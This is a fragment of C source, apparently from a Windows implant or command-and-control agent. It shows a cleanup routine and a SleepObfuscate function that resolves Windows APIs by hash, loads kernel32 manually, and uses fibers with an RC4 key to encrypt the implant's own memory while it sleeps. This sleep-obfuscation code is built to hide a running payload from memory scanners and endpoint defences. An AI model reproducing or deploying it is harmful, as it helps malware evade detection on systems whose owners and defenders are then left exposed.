Api.RtlFreeHeap( NtCurrentPeb()->ProcessHeap, 0, Beg );
Beg = NULL;
};
if ( Spf != NULL ) {
Api.RtlFreeHeap( NtCurrentPeb()->ProcessHeap, 0, Spf );
Spf = NULL;
};
if ( Cap != NULL ) {
Api.RtlFreeHeap( NtCurrentPeb()->ProcessHeap, 0, Cap );
Cap = NULL;
};
if ( Ini != NULL ) {
Api.RtlFreeHeap( NtCurrentPeb()->ProcessHeap, 0, Ini );
Ini = NULL;
};
if ( Src != NULL ) {
Api.NtClose( Src );
Src = NULL;
};
if ( Thd != NULL ) {
Api.NtTerminateThread( Thd, STATUS_SUCCESS );
Api.NtClose( Thd );
Thd = NULL;
};
if ( Evt != NULL ) {
Api.NtClose( Evt );
Evt = NULL;
};
if ( Adv != NULL ) {
Api.LdrUnloadDll( Adv );
Adv = NULL;
};
if ( K32 != NULL ) {
Api.LdrUnloadDll( K32 );
K32 = NULL;
};
RtlSecureZeroMemory( &Api, sizeof( Api ) );
RtlSecureZeroMemory( &Key, sizeof( Key ) );
RtlSecureZeroMemory( &Rc4, sizeof( Rc4 ) );
Fbr->SwitchToFiber( Fbr->Master );
};
/*!
*
* Purpose:
*
* Sets up a temporary stack for the call to avoid
* using up too much memory. Leverages Sleep_Fiber
* to obfuscate the current thread and set it to
* R/W
*
!*/
D_SEC( B ) VOID WINAPI SleepObfuscate( _In_ ULONG Timeout )
{
F_PARAM Fbr;
UNICODE_STRING Uni;
PVOID K32 = NULL;
RtlSecureZeroMemory( &Fbr, sizeof( Fbr ) );
RtlSecureZeroMemory( &Uni, sizeof( Uni ) );
Fbr.RtlInitUnicodeString = PeGetFuncEat( PebGetModule( H_LIB_NTDLL ), H_API_RTLINITUNICODESTRING );
Fbr.LdrUnloadDll = PeGetFuncEat( PebGetModule( H_LIB_NTDLL ), H_API_LDRUNLOADDLL );
Fbr.LdrLoadDll = PeGetFuncEat( PebGetModule( H_LIB_NTDLL ), H_API_LDRLOADDLL );
Fbr.RtlInitUnicodeString( &Uni, C_PTR( G_PTR( L"kernel32.dll" ) ) );
Fbr.LdrLoadDll( NULL, 0, &Uni, &K32 );
if ( K32 != NULL ) {
Fbr.ConvertThreadToFiber = PeGetFuncEat( K32, H_API_CONVERTTHREADTOFIBER );
Fbr.ConvertFiberToThread = PeGetFuncEat( K32, H_API_CONVERTFIBERTOTHREAD );
Fbr.SwitchToFiber = PeGetFuncEat( K32, H_API_SWITCHTOFIBER );
Fbr.DeleteFiber = PeGetFuncEat( K32, H_API_DELETEFIBER );
Fbr.CreateFiber = PeGetFuncEat( K32, H_API_CREATEFIBER );
if ( ( Fbr.Master = Fbr.ConvertThreadToFiber( &Fbr ) ) ) {
if ( ( Fbr.Slave = Fbr.CreateFiber( 0x1000 * 6, C_PTR( G_PTR( Sleep_Call ) ), &Fbr ) ) ) {
Fbr.Time = Timeout;
Fbr.Buffer = C_PTR( G_PTR( Start ) );
Fbr.Length = U_PTR( U_PTR( G_END() ) - U_PTR( G_PTR( Start ) ) );
Fbr.SwitchToFiber( Fbr.Slave );
Fbr.DeleteFiber( Fbr.Slave );
};
Fbr.ConvertFiberToThread();
};
Fbr.LdrUnloadDll( K32 );
};
RtlSecureZeroMemory( &Fbr, sizeof( Fbr ) );
RtlSecureZeroMemory( &Uni, sizeof( Uni ) );
};
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